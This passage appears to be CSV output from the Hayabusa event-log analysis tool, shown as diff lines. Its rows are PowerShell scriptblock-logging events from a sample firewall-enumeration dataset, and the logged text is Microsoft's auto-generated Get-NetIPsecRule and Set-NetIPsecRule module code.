$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Param",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = 